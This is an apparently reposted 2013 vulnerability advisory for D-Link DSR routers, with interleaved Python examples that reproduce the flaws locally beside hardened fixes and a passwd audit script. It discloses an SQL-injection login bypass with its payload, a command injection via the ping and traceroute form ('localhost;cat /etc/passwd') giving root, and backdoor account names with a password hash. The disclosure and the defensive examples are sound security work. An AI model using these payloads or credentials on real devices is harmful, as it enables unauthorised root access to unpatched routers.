AndrewHaxalot

D-Link DSR Router Series - Remote Root Shell

Dec 16th, 2013
#
# CVEs:
# CVE-2013-5945 - Authentication Bypass by SQL-Injection
# CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers:
# D-Link DSR-150 (Firmware < v1.08B44)
# D-Link DSR-150N (Firmware < v1.05B64)
# D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
# D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
# D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Download URL:
# http://tsd.dlink.com.tw
#
# Arch:
# mips and armv6l, Linux
#
# Author:
# 0_o -- null_null
# nu11.nu11 [at] yahoo.com
#
# Date:
# 2013-08-18
#
# Purpose:
# Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites:
# Network access to the router ports 443 (HTTPS webUI) and 23 (telnet).
# !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# A list of identified vulns follows. This list is not exhaustive, as I assume
# more vulns are present that just slipped my attention.
# The fact that D-Link implemented a backdoor user (for what reason, please??)
# and just renamed it instead of completely removing it after it was targeted
# by my previous exploit, as well as the triviality of the vulns I found,
# suggests that more vulns are present that are comparably easy to
# exploit.
#
# Since 2013-12-03, patches are available for:
# DSR-150: Firmware v1.08B44
# DSR-150N: Firmware v1.05B64
# DSR-250 and DSR-250N: Firmware v1.08B44
# DSR-500 and DSR-500N: Firmware v1.08B77
# DSR-1000 and DSR-1000N: Firmware v1.08B77
# via http://tsd.dlink.com.tw
#
# And now, have a worthwhile read :-)
#


0. Contents:


1. Vulnerability: Authentication Bypass by SQL-Injection
(CVE-2013-5945)
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution
(CVE-2013-5946)
3. Exposure: D-Link backdoor user
4. Vulnerability: Use of weak hash algorithms
5. Exposure: Passwords are stored as plain text in config files
6. Vulnerability: Bad permissions on /etc/shadow



1. Vulnerability: Authentication Bypass by SQL-Injection
(CVE-2013-5945)


* Possible via the global webUI login form.

* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

function login.authenticate(tablename, tableInput)
    local username = tableInput["Users.UserName"]
    local password = tableInput["Users.Password"]
    local cur = db.execute(string.format([[
        SELECT *, ROWID AS _ROWID_ FROM %s
        WHERE %s = '%s' AND %s = '%s'
    ]], tablename, "UserName", username, "Password", password))
    local result = false
    local statusCode = "NONE"
    if cur then
        local row = cur:fetch({}, "a")
        cur:close()
        result = row ~= nil
        if result == false then
            statusCode = "USER_LOGIN_INVALID_PASSWORD"
        end
    end
    return result, statusCode
end

* Both form values are pasted into the query text by string.format, with no
quoting and no parameter binding, so this function creates an SQL statement
of the form:

SELECT *, ROWID AS _ROWID_ FROM Users WHERE UserName = 'user' AND Password = 'pass';

* Since there is a default admin user account called "admin" around, this is
easily exploitable by providing this to the login form:

username = admin
password = ' or 'a'='a

* ...resulting in this SQL statement:

SELECT *, ROWID AS _ROWID_
FROM Users
WHERE UserName = 'admin'
AND Password = '' or 'a'='a';

* Since AND binds tighter than OR, this WHERE clause is true for every row of
the Users table: cur:fetch() returns the first row, result becomes true, and
the supplied user name does not even have to exist. Old school SQL injection.
Ohh, by the way...

* The same fault can be found in captivePortal.lua
-- FREE NETWORKS FOR EVERYONE --



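To make the injection and its fix concrete, here is an added example that is not part of the advisory and not D-Link code: it re-implements the logic of login.authenticate() in Python on an in-memory SQLite table (SQLite is an assumption, based on /tmp/system.db and the ROWID AS _ROWID_ idiom; the three sample users are constructed for the example, modelled on the config dump in section 5). The vulnerable version formats the form values into the SQL text exactly as the Lua does; the hardened version binds them as parameters.

```python
import sqlite3

# Constructed sample Users table (assumption for this example; column names
# follow login.lua, the user names follow the listings in sections 3 and 5).
SAMPLE_USERS = [
    ("gkJ9232xXyruTRmY", "thisobviouslyisafakepass"),
    ("admin", "admin"),
    ("guest", "guest"),
]


def make_db():
    """Build the in-memory stand-in for /tmp/system.db."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return db


def authenticate_vulnerable(db, username, password):
    """Python rendering of login.authenticate(): both form values are
    formatted straight into the SQL text, like the string.format call in
    login.lua. Returns (logged_in, user name of the row that matched)."""
    sql = ("SELECT *, ROWID AS _ROWID_ FROM Users "
           "WHERE UserName = '%s' AND Password = '%s'" % (username, password))
    row = db.execute(sql).fetchone()
    # login.lua: result = row ~= nil  -> any row at all means "logged in"
    return row is not None, (row[0] if row else None)


def authenticate_fixed(db, username, password):
    """Hardened version: the values travel as bound parameters, so a quote
    character in the password is data, never SQL syntax."""
    row = db.execute(
        "SELECT *, ROWID AS _ROWID_ FROM Users WHERE UserName = ? AND Password = ?",
        (username, password),
    ).fetchone()
    return row is not None, (row[0] if row else None)


def matching_rows_vulnerable(db, username, password):
    """How many rows the injected WHERE clause matches. AND binds tighter
    than OR, so `... AND Password = '' or 'a'='a'` is true for every row,
    whatever user name was supplied."""
    sql = ("SELECT COUNT(*) FROM Users "
           "WHERE UserName = '%s' AND Password = '%s'" % (username, password))
    return db.execute(sql).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    payload = "' or 'a'='a"
    print("vulnerable:", authenticate_vulnerable(db, "admin", payload))
    print("rows matched:", matching_rows_vulnerable(db, "doesnotexist", payload))
    print("fixed:", authenticate_fixed(db, "admin", payload))
```

Run stand-alone, the vulnerable call reports a successful login as the first row of the table (the backdoor account, not "admin"), the injected clause matches all three rows even for a non-existent user name, and the parameterized query rejects the payload.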
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution
(CVE-2013-5946)


* Possible from the Tools --> System Check page.

* File /pfrm2.0/var/www/systemCheck.htm contains:

local function runShellCmd(command)
    local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
    local cmdOutput = pipe:read("*a")
    pipe:close()
    return cmdOutput
end
if (ButtonType and ButtonType == "ping") then
    [...]
    local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
    globalCmdOutput = runShellCmd (cmd_ping)
    statusMessage = "Pinging " .. ipToPing
    [...]
elseif (ButtonType and ButtonType == "traceroute") then
    [...]
    local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
    globalCmdOutput = runShellCmd(cmd)
    statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
    [...]
elseif (ButtonType and ButtonType == "dnslookup") then
    [...]
    util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
    statusMessage = "DNS Lookup for " .. internetNameToNsLookup
    [...]

* Command injection is possible in at least these form sections:

Ping or Trace an IP Address
Perform a DNS Lookup

* The only input validation is the "onclick" JavaScript in the page itself;
the server side uses the value as is. When using a browser, deactivate these
checks with a tool like Firebug. Tools like curl are not hindered by them at
all.

* All forms allow input like this:

localhost;<command>

example:

localhost;cat /etc/passwd

* This user provided value is then directly used as part of the input for the
call to runShellCmd(c) and thus io.popen(c) in the first form section and
os.execute(c) in the second form section. Since the web server itself runs as
root (see the process list in section 6), so does the injected command.

* Output from user provided commands gets displayed on the next page beneath
the benign command output.

example:

[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]



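The following is an added example, not code from the advisory or from D-Link, that reproduces the ping branch of systemCheck.htm in Python and places the hardened version next to it. The ping binary is replaced by `echo` (an assumption made so the example runs offline; echo simply prints whatever reached the shell), the vulnerable path hands the concatenated string to /bin/sh like io.popen() does, and the fixed path validates the target as an IP literal or DNS host name and runs an argv list with no shell involved. The `rejects()` helper and the host name regex are part of this example only.

```python
import ipaddress
import re
import subprocess

# Stand-in for the router's ping program: prints its arguments, so the output
# shows exactly what the shell received (assumption made for this example).
PING_PROG = "echo"

# RFC 1123 style host name: labels of letters, digits and hyphens, joined
# by dots. Shell metacharacters, spaces and quotes cannot match this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def run_shell_cmd(command):
    """Python rendering of runShellCmd(): the whole string is parsed by
    /bin/sh, like io.popen(), so ';', '|', '`' and '$(...)' are honoured."""
    proc = subprocess.run(command + " 2>&1", shell=True,
                          stdout=subprocess.PIPE, text=True)
    return proc.stdout


def ping_vulnerable(ip_to_ping, options="-c 1"):
    """Mirrors the ping branch of systemCheck.htm: the user value is
    concatenated into the command line unchecked."""
    return run_shell_cmd(PING_PROG + " " + ip_to_ping + " " + options)


def validate_target(value):
    """Server-side check the page lacks: accept an IPv4/IPv6 literal or a
    DNS host name, refuse everything else."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError("invalid target: %r" % value)


def ping_fixed(ip_to_ping, options=("-c", "1")):
    """Hardened version: validated target, argv list, shell=False, so no
    shell ever parses user input."""
    target = validate_target(ip_to_ping)
    argv = [PING_PROG, target, *options]
    proc = subprocess.run(argv, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT, text=True)
    return proc.stdout


def rejects(value):
    """True if validate_target() refuses the value."""
    try:
        validate_target(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    injected = "localhost;echo INJECTED"
    print("vulnerable output:\n" + ping_vulnerable(injected))
    print("fixed output:\n" + ping_fixed("127.0.0.1"))
    print("fixed rejects injection:", rejects(injected))
```

With the vulnerable function the string "localhost;echo INJECTED" produces two shell commands and the second one's output appears in the result, which is exactly how the /etc/passwd dump above ends up inside the traceroute textarea. The hardened function never reaches the shell with that input.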
3. Exposure: D-Link backdoor user:


* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
That was the account I hacked before with my previous exploit:
http://www.exploit-db.com/papers/22930/
And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
Instead of removing the backdoor, D-Link just created a new one.
Note that every account in this file, not only root, has UID 0, and that the
new backdoor account carries its (MD5-crypt, $1$) password hash directly in
the world-readable /etc/passwd rather than in /etc/shadow.

* I verified this by showing the /etc/profile. Despite the comment, the test
is not for root but for the backdoor user name: every other user is dropped
into the restricted CLI, while gkJ9232xXyruTRmY gets a plain shell prompt:

# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
    trap "/bin/login" SIGINT
    trap "" SIGTSTP
    /pfrm2.0/bin/cli
    exit
fi
PS1='DSR-250N> '



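As an added check that is not part of the advisory, the audit below parses the /etc/passwd listing from this section (embedded as constructed sample input so it runs offline) and flags what a reviewer of a firmware image would want to see at a glance: accounts other than root that have UID 0, accounts whose password hash sits in passwd itself instead of shadow, and UID-0 accounts with a login shell whose names are not on an expected list. The expected-name list and the no-login shell set are assumptions of this example, not facts from the page.

```python
# Constructed sample input: the /etc/passwd listing from the advisory.
SAMPLE_PASSWD = """\
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
"""

# Shells that cannot be used for an interactive login (assumed list).
NOLOGIN_SHELLS = frozenset({"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"})

# Account names one expects on a DSR-class router (assumption for the example).
EXPECTED_NAMES = frozenset({"root", "admin", "guest", "nobody"})

# Second-field values that mean "no hash stored here".
NO_HASH_MARKERS = frozenset({"x", "!", "*", ""})


def parse_passwd(text):
    """Split a passwd file into dicts with the usual seven fields; the
    GECOS field may contain commas but never colons."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries


def uid0_accounts(entries):
    """Every account that is effectively root, other than root itself."""
    return [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]


def hash_in_passwd(entries):
    """Accounts whose password hash lives in the world-readable passwd file
    instead of shadow, i.e. is available for offline cracking to anyone."""
    return [e["name"] for e in entries if e["pw"] not in NO_HASH_MARKERS]


def unexpected_root_logins(entries, expected=EXPECTED_NAMES):
    """UID-0 accounts with a usable login shell whose name is not expected:
    on the DSR listing these are the two vendor backdoor accounts."""
    return [e["name"] for e in entries
            if e["uid"] == 0
            and e["shell"] not in NOLOGIN_SHELLS
            and e["name"] not in expected]


def audit(text):
    """Run all three checks over a passwd file and return the findings."""
    entries = parse_passwd(text)
    return {
        "uid0": uid0_accounts(entries),
        "hash_in_passwd": hash_in_passwd(entries),
        "unexpected_root_logins": unexpected_root_logins(entries),
    }


if __name__ == "__main__":
    for key, names in audit(SAMPLE_PASSWD).items():
        print("%s: %s" % (key, ", ".join(names) or "-"))
```

On the sample, all five non-root accounts come back as UID 0 (there is no user separation at all, which section 6 also observes), only the new backdoor account stores a hash in passwd, and the two unexpected root logins are precisely the old and the new backdoor names. To audit a real image, feed the file contents to audit() instead of the sample string.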
4. Vulnerability: Use of weak hash algorithms:


* In /etc/shadow, passwords are stored as traditional salted DES crypt(3)
hashes. This hash type only uses the first 8 characters of the password, so
users can log in via SSH or telnet by typing just the first 8 characters of
their password.

* An effective password length limit of 8 characters keeps the key space
small enough to make brute force attacks on user accounts very feasible, even
if the user chose a longer password.



5. Exposure: Passwords are stored as plain text in config files:


* A look into the system config file /tmp/teamf1.cfg.ascii, from which
/tmp/system.db is built at boot time, reveals that all user passwords are
stored in plain text.

Example:

[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]



6. Vulnerability: Bad permissions on /etc/shadow


* The file is world readable (mode 644) where it should be 600. Fixing that
alone would gain little, though: every process runs as root, so no user
separation is done anyway.

DSR-250N> ls -l -a /etc/shadow
-rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
PID USER VSZ STAT COMMAND
1 root 2700 S init
2 root 0 SW< [kthreadd]
3 root 0 SW< [ksoftirqd/0]
4 root 0 SW< [events/0]
5 root 0 SW< [khelper]
8 root 0 SW< [async/mgr]
111 root 0 SW< [kblockd/0]
120 root 0 SW< [khubd]
123 root 0 SW< [kseriod]
128 root 0 SW< [kslowd]
129 root 0 SW< [kslowd]
150 root 0 SW [pdflush]
151 root 0 SW [pdflush]
152 root 0 SW< [kswapd0]
200 root 0 SW< [aio/0]
210 root 0 SW< [nfsiod]
220 root 0 SW< [crypto/0]
230 root 0 SW< [cns3xxx_spi.0]
781 root 0 SW< [mtdblockd]
860 root 0 SW< [usbhid_resumer]
874 root 0 SW< [rpciod/0]
903 root 0 SWN [jffs2_gcd_mtd4]
909 root 0 SWN [jffs2_gcd_mtd5]
918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
1049 root 2704 S /usr/sbin/telnetd -l /bin/login
1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
1141 root 37000 S /pfrm2.0/bin/sshd
1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
1560 root 0 SW< [key_timehandler]
1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
1600 root 8036 S rvgd /tmp/system.db
1612 root 0 SW [cavium]
1621 root 8424 S vpnKAd /tmp/system.db
1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
1771 root 2680 S /pfrm2.0/bin/statusD
1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
2205 root 1904 S /pfrm2.0/bin/fReset
2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
3355 root 1768 S /pfrm2.0/bin/rt2860apd
3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>